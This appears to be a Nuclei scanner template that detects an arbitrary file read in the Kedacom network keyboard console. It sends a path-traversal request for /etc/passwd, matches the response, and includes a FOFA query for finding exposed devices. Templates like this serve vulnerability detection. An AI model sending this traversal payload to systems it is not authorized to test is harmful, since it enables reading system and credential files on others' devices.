id: kedacom-network-lfi

info:
  name: Kedacom Network Keyboard Console - Arbitrary File Read
  author: DhiyaneshDk
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: "网络键盘控制台"
  tags: lfi,kedacom,network

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "text/html"
          - "Server: kedacom-hs"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a004730450220650b2d5c56c64b08212b1f4dbfd717fb60bedc319ea599bd7760f92428ee2a90022100a355bdeb5fc1c3c37d33ebf5d3990be8cf6c30109c7deedf10bca384f4e2ca45:922c64590222798bb761d5b6d8e72950
